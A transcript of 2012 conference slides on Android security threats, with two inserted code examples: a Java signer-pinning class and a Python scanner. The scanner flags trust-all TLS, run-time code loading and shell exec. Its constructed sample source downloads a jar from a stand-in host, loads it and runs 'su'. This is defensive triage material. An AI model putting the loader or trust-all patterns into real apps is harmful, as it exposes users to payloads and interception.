Smau Milano 2012 Igor Falcomata
1.
Android and mobile security: client side, server side, privacy
Speaker: Igor Falcomatà
do android malware writers dream of electric sheep?
AIPSI seminars
free advertising > Android e mobile security: client side, server side, privacy. – SMAU – AIPSI seminars – 18 Oct 2012 – Milan
http://creativecommons.org/licenses/by-sa/2.0/it/deed.it
© Igor Falcomatà <ifalcomata@enforcer.it>, some rights reserved: http://creativecommons.org/licenses/by-sa/2.0/it/deed.it - Page 1
2.
Who:
Speaker: Igor Falcomatà, aka "koba"
Chief Technical Officer, ifalcomata@enforcer.it
• professional activity:
•vulnerability assessment and penetration testing (~13 years)
•security consulting
•training
• other:
•sikurezza.org
•(F|Er|bz)lug
3.
What:
a little bran from my own sack..
• App.. HTML5.. BYOD.. Cloud.. TheNextBuzzword.. how do these components interact with users' privacy, the security of data on devices and on servers, and global entropy?
• And the good old vulnerabilities in web applications?
• Examples and details on the Android platform
• Suitable in general for anyone interested in the security of "mobile" applications.
..and a lot of flour from other people's mills!
4.
Why (device):
malware/exploit writer's dream platform?
• market penetration and "geopardizzazione" (AUGH!)
• sources (AOSP), docs, SDK, NDK, emulator, ..
• .apk → decompilation, reversing, debugging
• OS updates, apps and alternative markets
• application permissions "delegated" to the users
• Linux kernel, ~ Linux userspace and libraries (and bugs)
• exploit mitigation techniques (fail) (< 2.3, < 4.0.3)
• OOB "covert" channels (umts/gprs, SMS, ..)
• little-explored territory: custom OS/libs, hw drivers
5.
Why (users):
(governments|spies|stalkers|..)'s dream platform?
• personal data (mail, documents, contacts, calendar, ..)
• interception (audio, video, messaging, network, ..)
• geolocation (photos, social networks, ..)
• credentials (sites, mail, VPN, ..) → cloud storage
• HTML-like client side attacks
• EvilApp wants to eat your soul.. Install? YES!!!
• BY0D (Bring Your 0wned Device)
• banking OTP ($$)
• NFC ($$)
6.
Why (back-ends):
web application hacker's dream platform?
• "private" URLs and web services
• business logic exposed (client-side)
• -> device -> credentials -> back-end
• -> device -> storage -> back-end
• hard-coded credentials and certificates (.apk)
• no/lazy input validation
• no/broken authentication & session management
• the good ole web security vulns
7.
Adoption
http://www.webpronews.com/guess-how-many-android-devices-have-now-been-activated-google-io-2012-06
and many (AOSP-based) devices that never "activate" ..
8.
Versions
http://developer.android.com/about/dashboards/index.html
and many devices that use alternative markets ..
9.
(Low Cost) Devices
http://www.alibaba.com/trade/search?fsb=y&IndexArea=product_en&SearchText=android
http://en.wikipedia.org/wiki/Comparison_of_Android_devices
and many devices that use alternative markets ..
10.
Docs & Tools
http://developer.android.com/
• API
• Examples & Howtos
• Sources (AOSP)
• ..
• SDK/NDK
• Eclipse plugin (ADT)
• Emulator (Arm, Intel, ..)
• debugging (ADB, ..)
11.
Exploiting Android is c00l!
http://cc.thinkst.com/searchMore/android/
+ google, slideshare, stackoverflow, ypse, ..
12.
Android software stack
http://en.wikipedia.org/w/index.php?title=File:Android-System-Architecture.svg
13.
Kernel
http://en.wikipedia.org/wiki/Android_(operating_system)#Linux
http://elinux.org/Android_Kernel_Features#Kernel_features_unique_to_Android
• Architectures: ARM, (MIPS, x86, ..)
• Kernel
• Linux kernel 2.6.x (Android 1, 2 and 3.x)
• Linux kernel 3.0.x (Android 4.x)
• standard components and drivers
• FS, processes, permissions
• standard vulnerabilities ;)
• Custom components
• binder, ashmem, pmem, logger, wakelocks, OOM, alarm timers, paranoid network security, gpio, ..
• android and vendor custom hw drivers
• new vulnerabilities to discover ;)
14.
Libraries + VM
http://source.android.com/tech/security/index.html#the-application-sandbox
http://en.wikipedia.org/wiki/Dalvik_(software)
• Sandbox (OS level)
• sandboxing with Linux uid/gid + kernel patches (protected API)
• 1 process = 1 application = 1 VM (+ OS components)
• protected API for hardware access: camera, gps, bluetooth, telephony, SMS/MMS, network connections
• root = root (full access)
• Libraries
• bionic libc (!= gnu libc, !posix)
• udev, WebKit, OpenGL, SQLite, crypto, .. (& bugs)
• Dalvik VM (!= JVM)
• Java code -> dex bytecode
• custom Java libraries
• can run native code (syscalls, ioctls, ..) -> kernel
15.
Libraries + VM
http://source.android.com/tech/security/index.html#the-application-sandbox
http://en.wikipedia.org/wiki/Dalvik_(software)
• Sandbox (OS level)
• sandboxing with Linux uid/gid + kernel patches (protected API)
• 1 process = 1 application = 1 VM (+ OS components)
• protected API for hardware access: camera, gps, bluetooth, telephony, SMS/MMS, network connections
• root = root (full access)
• Libraries
• bionic libc (!= gnu libc, !posix)
• udev, WebKit, OpenGL, SQLite, crypto, .. (& bugs)
• Dalvik VM (!= JVM)
• Java code -> dex bytecode
• custom Java libraries
• can run native code (syscalls, ioctls, ..) -> kernel
"Like all security features, the Application Sandbox is not unbreakable. However, to break out of the Application Sandbox in a properly configured device, one must compromise the security of the Linux kernel."
16.
Root(ing)
http://source.android.com/tech/security/index.html#rooting-of-devices
better to develop on the emulator or on a dedicated device :)
17.
Updates
https://developer.android.com/guide/faq/security.html#fixes
●updates delegated to carriers/vendors ...
●aftermarket/homebrew (cyanogenmod, ..)
●app updates via the market
18.
Exploit mitigation techniques
https://developer.android.com/guide/faq/security.html#fixes
https://blog.duosecurity.com/2012/07/exploit-mitigations-in-android-jelly-bean-4-1/
19.
(FAIL)
http://www.immunityinc.com/infiltrate/2011/presentations/Android_Attacks.pdf
"Reasonably competent attackers with no specific background in Android hacking can go from zero to owning Immunity's CEO in the span of a week"
Bas Albert + Massimiliano Oldani
Beating Up Android [Practical Android Attacks] (Android 2.1)
20.
Known vulnerabilities (scanner)
http://www.xray.io/#vulnerabilities
21.
Other attack vectors
(much more practical)
• rogue App
• trojan App
• trojan aftermarket fw (or carrier trojan ... <g>)
• network traffic
• client-side ~HTML attacks
• decompilation / reversing of applications
• filesystem / permissions
• setuid
• practically unused in "stock" Android
• rooted devices + third-party software
• homebrew (cyanogenmod, ..)
22.
App Security Permissions
http://source.android.com/tech/security/index.html#how-users-understand-third-party-applications
permissions are declared in the application's Manifest and must be accepted by the user at install time
packages (.apk) are digitally signed for the OS and the Play Store ...
"Applications can be signed by a third-party (OEM, operator, alternative market) or self-signed. Android provides code signing using self-signed certificates that developers can generate without external assistance or permission. Applications do not have to be signed by a central authority. Android currently does not perform CA verification for application certificates."
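Added example for the quoted signing model above (not from the slides and not the speaker's code): because Android does no CA verification and self-signed certificates are the norm, a package name alone proves nothing about who built an app, so an app that shares data with a companion package should pin that package's signing certificate. The package name and SHA-256 fingerprint below are placeholders, and the companion app and its intent are hypothetical.

```java
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.Signature;
import java.math.BigInteger;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

/**
 * Signer pinning for a companion package (added example, not the speaker's code).
 *
 * Android checks that an update is signed with the same key as the installed
 * version, but never validates the certificate against a CA. An app with the
 * same package name from an alternative market is simply another signer, so
 * comparing the SHA-256 of the signer's DER certificate with a value compiled
 * into this app is the check that actually binds the name to a key.
 */
public final class SignerPin {

    // Hypothetical companion package; replace with the real one.
    static final String TRUSTED_PACKAGE = "com.example.companion";
    // Placeholder: SHA-256 (lower-case hex) of the companion's DER signing
    // certificate, taken from its release keystore with "keytool -list -v".
    static final String TRUSTED_SHA256 =
            "0000000000000000000000000000000000000000000000000000000000000000";

    private SignerPin() {}

    /** True only if pkg is installed and every one of its signers matches the pin. */
    @SuppressWarnings("deprecation") // GET_SIGNATURES: the API of 2012-era Android, deprecated later
    public static boolean isTrusted(Context ctx, String pkg) {
        PackageInfo info;
        try {
            info = ctx.getPackageManager().getPackageInfo(pkg, PackageManager.GET_SIGNATURES);
        } catch (PackageManager.NameNotFoundException e) {
            return false; // not installed: nothing to trust
        }
        if (info.signatures == null || info.signatures.length == 0) {
            return false;
        }
        // Require *all* signers to match. Accepting "any signer matches" would let
        // a package carrying an extra, unknown key pass the check.
        for (Signature sig : info.signatures) {
            if (!sha256Hex(sig.toByteArray()).equals(TRUSTED_SHA256)) {
                return false;
            }
        }
        return true;
    }

    /** SHA-256 of the DER bytes as 64 lower-case hex digits. */
    static String sha256Hex(byte[] der) {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(der);
            return String.format("%064x", new BigInteger(1, digest));
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 unavailable", e);
        }
    }

    /** Usage: hand data to the companion only after its signer has been pinned. */
    public static void sendToCompanion(Context ctx, Intent data) {
        if (!isTrusted(ctx, TRUSTED_PACKAGE)) {
            throw new SecurityException("refusing to talk to an unpinned " + TRUSTED_PACKAGE);
        }
        data.setPackage(TRUSTED_PACKAGE); // explicit target: no implicit intent to hijack
        ctx.startService(data);
    }
}
```

The same pin comparison belongs wherever the app decides to trust another package: before binding to its service, before answering its content-provider query, or before accepting a broadcast from it. Comparing the whole DER certificate digest rather than the subject name is deliberate, since anyone can self-sign a certificate with the same subject.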
23.
Google Bouncer
http://www.h-online.com/security/news/item/Google-s-Bouncer-scans-the-Android-Market-for-Malware-1427814.html
24.
Google Bouncer (PWNED)
http://jon.oberheide.org/blog/2012/06/21/dissecting-the-android-bouncer/
25.
Rogue App
http://blogs.mcafee.com/mcafee-labs/android-malware-pairs-man-in-the-middle-with-remote-controlled-banking-trojan
26.
Trojan App
http://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/
http://jon.oberheide.org/files/summercon10-androidhax-jonoberheide.pdf
● “innocent” application
● published on the market
● “calls home”
● downloads a malicious payload
● executes it at run time
27.
Trojan aftermarket firmware
(no publicly known cases, AFAIK)
http://labs.neohapsis.com/2011/12/21/the-security-implications-of-custom-android-roms/
28.
Network traffic
http://phys.org/news/2011-05-android-devices-susceptible-eavesdropping.html
● no HTTPS (ouch, ouch, ouch)
● MiTM
● Hot Spot
● Rogue APs
29.
Decompiling / reversing
Batteries (almost) included, no assembly required
http://code.google.com/p/apk-extractor/
“is capable of parsing Android Manifest, XML layouts etc. and converting DEX/ODEX to CLASS, which can be opened by any de-compiler.”
http://code.google.com/p/dex2jar/
Tools to work with android .dex and java .class files (read, convert, modify, deobfuscate, ..)
http://code.google.com/p/smali/
An assembler/disassembler for Android's dex format
http://code.google.com/p/android-apktool/
It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them [..]
http://java.decompiler.free.fr/?q=jdgui
Yet another fast Java decompiler
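Slides 26, 28 and 29 describe, in turn, a trojan app that fetches and executes a payload at run time, apps that talk in clear or accept any TLS certificate, and the toolchain (dex2jar, apktool, JD-GUI) that turns an .apk back into readable source. As an added example that is not part of the talk, the Python script below is a first-pass triage to run over that decompiled source from the reviewer's side: it flags the code patterns behind those three risks and reports file and line. The rule names and the three sample Java sources are constructed for this example, and every hit is a lead for manual review, not a verdict.

```python
"""Triage of decompiled Android sources for the risk patterns in the slides:
cleartext HTTP, TLS validation that accepts anything, and code that fetches
and loads a payload at run time. Input is Java-like decompiler output
(smali spellings differ, e.g. Ldalvik/system/DexClassLoader;).
Heuristic, grep-style: a hit is a lead for manual review, not a verdict.
(Added example, not the talk's code; rule names are constructed.)
"""
import re
from collections import defaultdict

# (rule name, regex over the whole source text, why a reviewer cares)
RULES = [
    ("cleartext-url", re.compile(r'"http://[^"\s]+"'),
     "traffic in clear: readable and modifiable by a MITM or rogue AP"),
    ("trust-all-tls",
     re.compile(r"checkServerTrusted\s*\([^)]*\)\s*(throws\s+[\w.]+\s*)?\{\s*\}"),
     "empty checkServerTrusted: any server certificate is accepted"),
    ("hostname-noop",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER|"
                r"verify\s*\(\s*String\s+\w+\s*,\s*SSLSession\s+\w+\s*\)\s*\{\s*return\s+true\s*;"),
     "hostname verification disabled: a valid certificate for any name passes"),
    ("dynamic-load",
     re.compile(r"\b(DexClassLoader|PathClassLoader|DexFile\.loadDex)\b"),
     "loads code at run time: check where the dex/jar comes from"),
    ("shell-exec", re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\("),
     "spawns a process: unusual for an 'innocent' app"),
]
WHY = {name: why for name, _, why in RULES}


def scan_source(source):
    """Return sorted, de-duplicated (rule, line_no) findings for one source file."""
    findings = set()
    for name, regex, _ in RULES:
        for match in regex.finditer(source):
            line_no = source.count("\n", 0, match.start()) + 1
            findings.add((name, line_no))
    return sorted(findings, key=lambda f: (f[1], f[0]))


def summarize(sources):
    """Count findings per rule across a {filename: source} decompiled tree."""
    counts = defaultdict(int)
    for source in sources.values():
        for name, _ in scan_source(source):
            counts[name] += 1
    return dict(counts)


# Constructed sample "decompiled" sources; example.invalid is a reserved name.
SAMPLE_SOURCES = {
    "com/example/constructed/Updater.java": '''
public class Updater {
    private static final String URL = "http://update.example.invalid/payload.jar";
    void run(Context ctx) {
        File jar = download(URL, ctx.getDir("dex", 0));
        DexClassLoader cl = new DexClassLoader(jar.getPath(), ctx.getDir("odex", 0).getPath(), null, getClass().getClassLoader());
        Runtime.getRuntime().exec("su");
    }
}
''',
    "com/example/constructed/TrustAll.java": '''
class TrustAll implements X509TrustManager {
    public void checkClientTrusted(X509Certificate[] c, String a) throws CertificateException {}
    public void checkServerTrusted(X509Certificate[] c, String a) throws CertificateException {}
    public X509Certificate[] getAcceptedIssuers() { return null; }
}
''',
    "com/example/constructed/Clean.java": '''
class Clean {
    private static final String API = "https://api.example.invalid/v1";
}
''',
}


if __name__ == "__main__":
    for filename, source in SAMPLE_SOURCES.items():
        for name, line_no in scan_source(source):
            print(f"{filename}:{line_no}: [{name}] {WHY[name]}")
    print("summary:", summarize(SAMPLE_SOURCES))
```

The sample `Updater` class is the slide-26 shape (call home, download, load, execute) in three lines, and `TrustAll` is the slide-28 shape; `Clean` shows that an `https://` constant does not trip the cleartext rule. Point `summarize` at a dictionary built by walking the output directory of dex2jar + a decompiler to get the same report for a real package.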
30.
.apk tools demo
Batteries (almost) included, no assembly required
demo
31.
reversing, injections, ..
(some) assembly required
http://mulliner.org/android/feed/binaryinstrumentationandroid_mulliner_summercon12.pdf
Binary Instrumentation on Android, Collin Mulliner
http://www.slideshare.net/jserv/practice-of-android-reverse-engineering
Practice of Android Reverse Engineering, Jim Huang
http://code.google.com/p/androguard/
Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !)
https://redmine.honeynet.org/projects/are
Virtual Machine for Android Reverse Engineering
http://radare.org
radare, the reverse engineering framework
32.
OWASP Top 10
Mobile Risks (RC1)
https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks
http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
33.
(Questions?) Do Android malware writers dream of electric sheep?
seminari AIPSI: free advertising >